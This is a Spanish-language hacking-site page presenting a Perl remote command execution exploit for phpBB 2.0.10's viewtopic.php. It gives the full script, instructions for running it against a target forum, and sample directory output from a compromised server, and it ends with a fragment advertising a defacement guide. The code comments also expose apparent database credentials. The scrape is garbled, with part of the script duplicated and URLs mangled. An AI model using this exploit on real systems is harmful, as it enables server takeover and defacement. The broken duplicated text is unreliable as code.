Copyrigth Todos los derechos reservados http://hackglobal.es.tl Hackers en accion.
TE LLEVARAS UNA GRAN SORPRESA SI TOCAS MIS COSAS!!!!!!
|
![]() |
|||||||||
Remote Command Execution en PhpBB 2.0.10
Este si es un bug algo mas reciente (3 semanas). Consiste en un error el archivo viewtopic.php de los populares foros phpbb2, este bug puede ser utilizado para obtener una shell remota del servidor web y ejecutar comandos en el mismo Este exploit sirve para ver las carpetas y archivos que contiene phpbb 2.0.10 remotamente. Este es el codigo del exploit. Código: #!/usr/bin/perl ## succesfully tested on: 2.0.6 , 2.0.8 , 2.0.9 , 2.0.10 ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ## P.S. this code public after phpbb.com was defaced by really stupid man with nickname tristam ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ## fucking lamaz... ## ## ccteam.ru ## $dbname = "ccteam_phpbb2"; ## $dbuser = "ccteam_userphp bb"; ## $dbpasswd = "XCbRsoy1"; ## ## eat this dude... ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ if (@ARGV < 4) { print q(############################################################ phpBB <=2.0.10 remote command execution exploit by RusH security team // www.rst.void.r u ############################################################ usage: r57phpbb2010.p l www.phpbb.com [DIR] - directory where phpBB installed e.g. /phpBB/ or / [NUM] - number of existing topic [CMD] - command for execute e.g. ls or "ls -la" ############################################################ ); exit; } $serv = $ARGV ; $dir = $ARGV[1]; $topic = $ARGV[2]; $cmd = $ARGV[3]; $serv =~ s/(http://)//eg; print "*** CMD: [ $cmd ]rn"; print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~rn"; $cmd=~ s/(.*);$/$1/eg; $cmd=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg; $topic=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg; $path = $dir; $path .= 'viewtopic.php?t='; $path .= $topic; $path .= '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20'; $path .= $cmd; $path .= '%3B%20%65%63%68%6F%20%5F%45%4E%44%5F'; $path .= '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54% 54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.% 2527'; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] CONNECT FAILEDrn"; print $socket "GET $path HTTP/1.1n"; print $socket "Host: $servn"; print $socket "Accept: */*n"; print $socket "Connection: closenn"; $on = 0; while ($answer = <$socket>) { if ($answer =~ /^_END_/) { print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ rn"; exit(); } if ($on == 1) { print " $answer"; } if ($answer =~ /^_START_/) { $on = 1; } } print "[-] EXPLOIT FAILEDrn"; print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~rn"; ### EOF ### Lo guardas en un archivito de texto con el nombre que quieras, pero con la extension .pl y lo ejecutas en una shell con perl asi: shell@10:~$ perl bug.pl //hackglobal.es.tl/OTRAS-MAS.htmhttp://foro.xxxxx.com/phpBB/" target="_blank"> [DIR] [NUM] [CMD] params: [URL] - server url e.g. www.phpbb.com [DIR] - directory where phpBB installed e.g. /phpBB/ or / [NUM] - number of existing topic [CMD] - command for execute e.g. ls or "ls -la" ############################################################ ); exit; } $serv = $ARGV ; $dir = $ARGV[1]; $topic = $ARGV[2]; $cmd = $ARGV[3]; $serv =~ s/(http://)//eg; print "*** CMD: [ $cmd ]rn"; print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~rn"; $cmd=~ s/(.*);$/$1/eg; $cmd=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg; $topic=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg; $path = $dir; $path .= 'viewtopic.php?t='; $path .= $topic; $path .= '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20'; $path .= $cmd; $path .= '%3B%20%65%63%68%6F%20%5F%45%4E%44%5F'; $path .= '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54% 54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.% 2527'; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] CONNECT FAILEDrn"; print $socket "GET $path HTTP/1.1n"; print $socket "Host: $servn"; print $socket "Accept: */*n"; print $socket "Connection: closenn"; $on = 0; while ($answer = <$socket>) { if ($answer =~ /^_END_/) { print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~rn"; exit(); } if ($on == 1) { print " $answer"; } if ($answer =~ /^_START_/) { $on = 1; } } print "[-] EXPLOIT FAILEDrn"; print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~rn"; ### EOF ### Lo guardas en un archivo de texto con el nombre que quieras, pero con la extension .pl y lo ejecutas en una shell con perl asi: shell@10:~$ perl bug.pl //hackglobal.es.tl/OTRAS-MAS.htmhttp://foro.xxxxx.com/phpBB/ 124 "ls" total 500 ## drwxr-xr-x 12 dhn phpbb 896 Oct 13 18:23 . ## drwxrwxr-x 19 root phpbb 1112 Nov 12 15:08 .. ## drwxr-xr-x 2 dhn phpbb 152 Oct 13 18:23 CVS ## drwxr-xr-x 3 dhn phpbb 944 Jul 19 15:17 admin ## drwxrwxrwx 5 dhn phpbb 160 Aug 14 21:19 cache ## -rw-r--r-- 1 dhn phpbb 44413 Mar 11 2004 catdb.php ## -rw-r--r-- 1 dhn phpbb 5798 Jul 19 15:17 common.php ## -rw-r--r-- 1 root root 264 Jul 2 08:05 config.php ## drwxr-xr-x 3 dhn phpbb 136 Jun 24 06:40 db ## drwxr-xr-x 3 dhn phpbb 320 Jul 19 15:17 docs ## -rw-r--r-- 1 dhn phpbb 814 Oct 30 2003 extension.inc ## -rw-r--r-- 1 dhn phpbb 3646 Jul 10 04:21 faq.php ## drwxr-xr-x 2 dhn phpbb 96 Aug 12 14:59 files ## -rw-r--r-- 1 dhn phpbb 45642 Jul 12 12:42 groupcp.php ## drwxr-xr-x 7 dhn phpbb 240 Aug 12 16:22 images ## drwxr-xr-x 3 dhn phpbb 1048 Jul 19 15:17 includes ## -rw-r--r-- 1 dhn phpbb 14518 Jul 10 04:21 index.php ## drwxr-xr-x 60 dhn phpbb 2008 Sep 27 01:54 language Deface en 4nAlbum ############################################################################ */ Http://Www.hackglobal.es.tl*/ | Defacing with 4nAlbum ############################################################################ sh-2.05b$ ./ Escrito por Status-x [ KDEFACER@HOTMAIL.com ] - Mexico ############################################################################ **************************************************************************** |
![]() |